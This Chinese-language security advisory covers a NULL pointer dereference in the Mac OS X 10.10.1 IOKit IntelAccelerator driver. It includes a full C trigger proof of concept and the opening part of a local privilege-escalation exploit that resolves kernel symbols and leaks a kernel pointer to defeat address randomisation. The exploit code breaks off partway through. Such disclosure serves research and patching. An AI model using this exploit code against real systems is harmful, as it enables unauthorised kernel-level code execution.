Apple Mac OS X IOKit IntelAccelerator空指针间接引用本地

发布日期:2015-01-20
更新日期:2015-01-23

受影响系统:
Apple Mac OS X
描述:
BUGTRAQ  ID: 72262

OS X(前称Mac OS X)是苹果公司为麦金塔电脑开发的专属操作系统的最新版本。

Apple Mac OS X 10.10.1及更早版本的IOKit IntelAccelerator驱动在实现上存在内存操作不当导致的代码执行漏洞。如下文PoC所示,本地用户打开IntelAccelerator用户客户端(类型2)并以内存类型3调用IOConnectMapMemory即可触发空指针间接引用;攻击者可利用此漏洞以提升的权限执行任意代码。

<*来源:Google Security Research
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <fcntl.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>

#include <IOKit/IOKitLib.h>

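/*
 * PoC: open an IntelAccelerator user client (type 2) and ask it to map
 * memory type 3.  On an unpatched system this is expected to reach the
 * NULL dereference described in the advisory; if the call returns, its
 * status is printed instead so the outcome is visible either way.
 *
 * Exit status: 0 when every setup step succeeded and the map call was
 * issued, 1 when a setup step failed and the bug was never reached.
 */
int main(){
  kern_return_t err;

  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
  if(!matching){
    printf("unable to create service matching dictionary\n");
    return 1;
  }

  /* Per the IOKit API contract, IOServiceGetMatchingServices consumes one
   * reference to `matching`, so it is deliberately not released here. */
  io_iterator_t iterator = IO_OBJECT_NULL;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != KERN_SUCCESS){
    printf("no matches\n");
    return 1;
  }

  /* Only the first matching service is used; the iterator is not needed
   * afterwards. */
  io_service_t service = IOIteratorNext(iterator);
  IOObjectRelease(iterator);

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 1;
  }
  printf("got service: %x\n", service);

  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
  IOObjectRelease(service);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 1;
  }
  printf("got userclient connection: %x\n", conn);

  /* Hint address and size for the mapping; kIOMapAnywhere lets the kernel
   * pick a different address, which is why addr/size are reported back. */
  mach_vm_address_t addr = 0x414100000000;
  mach_vm_size_t size = 0x1000;

  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
  if (err != KERN_SUCCESS){
    printf("IOConnectMapMemory failed: 0x%x (bug not triggered)\n", (unsigned)err);
  } else {
    printf("mapped memory type 3 at 0x%llx (%llu bytes)\n",
           (unsigned long long)addr, (unsigned long long)size);
  }
  IOServiceClose(conn);
  return 0;
}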

// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
 // ianbeer
 #include <ctype.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/mman.h>
 #include <sys/stat.h>
 #include <unistd.h>

 #include <CoreFoundation/CoreFoundation.h>
 #include <IOKit/IOKitLib.h>

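/*
 * Resolve the address of an exported kernel symbol by running
 * `nm -g /mach_kernel | grep <sym> | cut -d' ' -f1` and parsing the first
 * 16 hex characters that come back.
 *
 * sym: symbol name to look up.  Because grep is used, it is matched as a
 *      substring, so a short name may resolve to the first symbol that
 *      merely contains it.
 * Returns the parsed address, or 0 when sym is empty or contains characters
 * outside the symbol-name alphabet, the command line would not fit, the
 * pipeline cannot be started, or it produces no output.
 */
uint64_t kernel_symbol(char* sym){
  if (sym == NULL || *sym == '\0') {
    return 0;
  }

  /* sym is spliced into a shell command line: accept only characters that
   * occur in Mach-O symbol names so no shell metacharacters get through. */
  for (const char *c = sym; *c != '\0'; c++) {
    if (!isalnum((unsigned char)*c) && *c != '_' && *c != '$' && *c != '.') {
      return 0;
    }
  }

  /* Bounded build of the command; the original strcpy/strcat pair would
   * overflow cmd on a long symbol name. */
  char cmd[1024];
  int n = snprintf(cmd, sizeof cmd, "nm -g /mach_kernel | grep %s | cut -d' ' -f1", sym);
  if (n < 0 || (size_t)n >= sizeof cmd) {
    return 0;
  }

  FILE* f = popen(cmd, "r");
  if (f == NULL) {
    return 0;
  }

  /* Read at most 16 hex digits; anything shorter (or nothing at all, when
   * there is no match) must not leave the buffer uninitialized. */
  char offset_str[17];
  size_t got = fread(offset_str, 1, 16, f);
  pclose(f);
  if (got == 0) {
    return 0;
  }
  offset_str[got] = '\0';

  return strtoull(offset_str, NULL, 16);
}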

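/*
 * Look up the file offset of __ZTV17IONDRVFramebuffer (the IONDRVFramebuffer
 * vtable symbol) in the IONDRVSupport kext binary via nm, and return that
 * offset plus 0x10 -- the distance from the symbol to the pointer that
 * leak() reads back out of the registry.
 *
 * Returns 0 when the nm pipeline cannot be started, prints nothing, or does
 * not parse as a non-zero hex number; callers can therefore treat 0 as
 * "unknown" rather than getting a bare 0x10 from a failed lookup.
 */
uint64_t leaked_offset_in_kext(){
  FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
  if (f == NULL) {
    return 0;
  }

  /* Read at most 16 hex digits and terminate at whatever was actually read,
   * so an empty or short result never parses uninitialized stack bytes. */
  char offset_str[17];
  size_t got = fread(offset_str, 1, 16, f);
  pclose(f);
  if (got == 0) {
    return 0;
  }
  offset_str[got] = '\0';

  uint64_t offset = strtoull(offset_str, NULL, 16);
  if (offset == 0) {
    return 0;
  }
  return offset + 0x10; /* offset from symbol to leaked pointer */
}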


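 /*
  * Read the 8-byte "AAPL,iokit-ndrv" property from the IOService plane of
  * the I/O registry (searched recursively from the root entry).  The exploit
  * treats its contents as a leaked kernel pointer; see leaked_offset_in_kext
  * for how it is turned into a load address.
  *
  * Returns the property's 8 bytes as a little-endian-as-stored uint64_t, or
  * the sentinel 1 when the property is missing, is not CFData, or is not
  * exactly 8 bytes long (a diagnostic is printed in each case).
  */
 uint64_t leak(){
   CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
                                                 kIOServicePlane,
                                                 CFSTR("AAPL,iokit-ndrv"),
                                                 kCFAllocatorDefault,
                                                 kIORegistryIterateRecursively);

   /* A missing property comes back as NULL; the original passed that
    * straight into CFGetTypeID and crashed. */
   if (p == NULL){
     printf("AAPL,iokit-ndrv property not found\n");
     return 1;
   }

   if (CFGetTypeID(p) != CFDataGetTypeID()){
     printf("expected CFData\n");
     CFRelease(p);
     return 1;
   }

   if (CFDataGetLength(p) != 8){
     printf("expected 8 bytes\n");
     CFRelease(p);
     return 1;
   }

   /* memcpy rather than a uint64_t* cast: the CFData byte pointer carries
    * no alignment guarantee. */
   uint64_t leaked;
   memcpy(&leaked, CFDataGetBytePtr(p), sizeof leaked);
   /* Per the IOKit API contract the search returns a retained object. */
   CFRelease(p);
   return leaked;
 }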

/* Hand-declared prototype for the loaded-kext info query used by
 * kext_load_addr below; none of the headers included by this file
 * provides it, so it is declared here by hand. */
extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);

uint64_t kext_load_addr(char* target_name){
  uint64_t addr = 0;
  CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
  CFIndex count = CFDictionaryGetCount(kd);
   
  void **keys;
  void **values;
   
  keys = (void **)malloc(sizeof(void *) * count);
  values = (void **)malloc(sizeof(void *) * count);
   
  CFDictionaryGetKeysAndValues(kd,
                                (const void **)keys,
                                (const void **)values);
